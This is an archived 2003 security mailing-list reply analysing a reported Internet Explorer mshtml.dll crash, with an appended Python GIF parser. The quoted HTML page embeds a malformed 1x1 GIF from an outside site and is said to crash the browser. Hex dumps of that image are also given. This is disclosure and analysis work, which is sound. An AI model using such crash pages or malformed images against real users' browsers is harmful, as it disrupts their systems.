Message-ID: <20030902173807.GA409@sentinelchicken.org>
From: tim-security at sentinelchicken.org (Tim)
Subject: New Microsoft Internet Explorer mshtml.dll Denial of Service?
Interesting...
> After a **lot** of html code "trimming" I came up with an offline version of
> the page like this:
>
> ------------------------------------------------------
> <html>
> <body>
> <table border="0" cellspacing="0" cellpadding="0">
> <tr>
> <td><img src="http://www.galad.com/frame/e1x1.gif" width="1" height="1"
> alt=""></td>
> </tr>
> </table>
> </body>
> </html>
> -------------------------------------------------------
>
> and this piece of code does crash my browser (6.0.2800.1106)
> on windows 2000 server all patches and fixes up to date.
>
> NOTE: Every time you **want** the browser to crash, you must delete it from
> the "Temporary Internet Files" before loading it in your browser.
>
> Although this image (e1x1.gif) is 1x1 GIF, ACDSee Classic calls it a "Bad or
> unrecognized image header".
> Does this image, in some way, affect the way IE does the parsing?
> Seems like it...

Yeah, the GIF image is almost certainly malformed. Not sure in what
way yet, as I am no GIF expert. Some interesting information though:

Opening it in the GIMP produces the following errors on stderr:

  GIF: too much input data, ignoring extra...
  GIF: bogus character 0x00, ignoring

The file's contents are:

  00000000 47 49 46 38 39 61 01 00 01 00 80 00 00 FF FF FF GIF89a..........
  00000010 FF FF FF 21 F9 04 01 00 00 01 00 2C 00 00 00 00 ...!.......,....
  00000020 01 00 01 00 00 02 02 4C 01 00 3B .......L..;

I then opened the file in the GIMP, and immediately saved it back to
another gif file, and it wrote:

  00000000 47 49 46 38 39 61 01 00 01 00 80 00 00 FF FF FF GIF89a..........
  00000010 00 00 00 21 F9 04 01 00 00 00 00 2C 00 00 00 00 ...!.......,....
  00000020 01 00 01 00 00 00 01 01 00 3B .........;

Which obviously has some differences. Anyone else better with GIF89a
than I?

tim
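
Added example, not part of the original message: a minimal GIF89a block walker in Python that parses the two hex dumps above and lists the fields that differ. The function and field names are this example's own, and lzw_codes assumes a stream short enough that the LZW code width never grows.

```python
import struct

# Bytes transcribed from the two hex dumps in the message above.
ORIGINAL = bytes.fromhex("47 49 46 38 39 61 01 00 01 00 80 00 00 FF FF FF"
                         "FF FF FF 21 F9 04 01 00 00 01 00 2C 00 00 00 00"
                         "01 00 01 00 00 02 02 4C 01 00 3B")
RESAVED = bytes.fromhex("47 49 46 38 39 61 01 00 01 00 80 00 00 FF FF FF"
                        "00 00 00 21 F9 04 01 00 00 00 00 2C 00 00 00 00"
                        "01 00 01 00 00 00 01 01 00 3B")

def sub_blocks(buf, pos):
    """Join length-prefixed data sub-blocks; return (data, offset past the 0x00 terminator)."""
    out = bytearray()
    while buf[pos]:
        out, pos = out + buf[pos + 1:pos + 1 + buf[pos]], pos + 1 + buf[pos]
    return bytes(out), pos + 1

def parse_gif(buf):
    """Walk a GIF89a stream block by block (truncated input raises IndexError or struct.error)."""
    f = {"signature": buf[:6].decode("ascii"), "screen": struct.unpack_from("<HH", buf, 6)}
    pos = 13 + (3 * (2 << (buf[10] & 7)) if buf[10] & 0x80 else 0)  # past global colour table
    f["palette"] = buf[13:pos].hex()
    while buf[pos] != 0x3B:                                # 0x3B = trailer
        if buf[pos] == 0x21:                               # extension: label, then sub-blocks
            label, (data, pos) = buf[pos + 1], sub_blocks(buf, pos + 2)
            if label == 0xF9:                              # graphic control extension
                f["transparent_flag"], f["transparent_index"] = data[0] & 1, data[3]
        elif buf[pos] == 0x2C:                             # image descriptor
            f["image_rect"] = struct.unpack_from("<HHHH", buf, pos + 1)
            local = buf[pos + 9]                           # packed byte: local colour table?
            pos += 10 + (3 * (2 << (local & 7)) if local & 0x80 else 0)
            f["lzw_min_code_size"] = buf[pos]
            f["lzw_data"], pos = sub_blocks(buf, pos + 1)
        else:
            raise ValueError(f"unexpected block 0x{buf[pos]:02x} at offset {pos}")
    f["trailing_bytes"] = len(buf) - pos - 1               # anything after the trailer
    return f

def lzw_codes(data, min_size):
    """Unpack LSB-first codes at the initial width, stopping at end-of-information."""
    width, eoi = min_size + 1, (1 << min_size) + 1
    bits, codes = int.from_bytes(data, "little"), []
    while len(codes) < len(data) * 8 // width and eoi not in codes:
        codes.append((bits >> (len(codes) * width)) & ((1 << width) - 1))
    return codes

def diff_fields(a, b):
    return {k: (a.get(k), b.get(k)) for k in sorted(a.keys() | b.keys()) if a.get(k) != b.get(k)}
```

On the first dump, lzw_codes(b"\x4c\x01", 2) returns [4, 1, 5], that is clear, colour index 1, end-of-information, with no bytes left after the trailer. diff_fields shows the re-saved dump, as printed, differing in the second palette entry, the transparent index, the LZW minimum code size (0 instead of 2) and the image data.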